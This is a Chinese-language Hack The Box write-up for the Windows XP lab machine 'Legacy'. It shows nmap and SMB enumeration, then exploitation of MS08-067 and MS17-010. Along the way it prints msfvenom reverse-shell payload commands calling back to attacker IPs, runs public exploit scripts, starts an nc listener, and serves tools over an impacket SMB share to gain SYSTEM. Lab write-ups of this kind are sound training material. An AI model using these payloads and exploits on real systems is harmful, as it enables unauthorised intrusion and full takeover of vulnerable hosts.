本文已参与「新人创作礼」活动,一起开启掘金创作之路
勘探
常规nmap扫描
root@kali# nmap 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds
root@kali# nmap -sU -p- --min-rate 10000 -oA nmap/alludp 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:34 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
137/udp open netbios-ns
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
root@kali# nmap -sC -sV -p 139,445 -oA nmap/scripts 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: -4h08m26s, deviation: 1h24m51s, median: -5h08m26s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b2:7b:09 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-02-19T17:29:16+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.42 seconds
445smb
查看一下共享文件夹共享了什么文件
先用smbmap看一下,关于smb我近期会放出一个使用指南,敬请关注
root@kali# smbmap -H 10.10.10.4
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.4...
[+] IP: 10.10.10.4:445 Name: 10.10.10.4
Disk Permissions
---- -----------
[!] Access Denied
root@kali# smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER
发现两种方式都被拒绝了访问
Vuln
nmap -p 445 --script vuln 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:27 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 5.49 seconds
发现暴漏了ms08-076和ms17-010两个非常有名的漏洞
然后msf打就是了手动之后咱们在研究
bin最近不好使了,找不到exp,百度又不让搜
还有一件事就是msf不能自动匹配target需要手动选择target,我试到第六个成功了target为win xp sp3 language:english
就这样
获取system权限
MS08-067
利用pocraw.githubusercontent.com/jivoi/pente…
在他这个脚本中详细的记载了这个脚本的利用方法,我在这里进行一个翻译
首先用msfvenom编写一个后门
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
然后需要猜测一个对方系统的版本
print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]
print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445'
print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)'
print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal'
print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English'
print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)'
print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)'
print '' print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:'
print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'
这里它提示了我们可以用nmap来猜测系统版本,但是在我们之前的勘探中没有发现对方系统的版本,那么我们只能进行猜测,答案是参数六,也就是系统版本Windows XP SP3 English (NX)
那么进行脚本利用
root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
记得打开nmap接收shell
root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
搞定
MS17-010
不多赘述,流程和我在blue中写的完全一样,想考oscp的朋友我建议不要使用msf,而是用我在blue中的手动方法
手动
使用一个python脚本GitHub – helviojunior/MS17-010: MS17-010
这个脚本我就利用那个send_and_execute.py这个脚本来上传我们的回连脚本
msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe
这样创建一个
python send_and_execute.py 10.10.10.40 backdoor.exe
然后用python执行
最后打开nc监听就好
nc -lvnp 4444
这里我直接复制粘贴了
后渗透
有一点需要提及就是xp文件系统和win7之后的系统有一点不一样
用户文件在根目录的一个叫Document and 什么的文件夹里,希望不要到时候找不到desktop
然后大部分我们熟知的命令在xp中是不能打的,比如说whoami,我们可以用smb共享一个出去
root@kali# smbserver.py a /usr/share/windows-binaries/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
这样
然后在主机中
C:\WINDOWS\system32>\10.10.14.14\a\whoami.exe
NT AUTHORITY\SYSTEM
\
今天的文章HTB靶场系列 Windows靶机 Legacy靶机分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/21835.html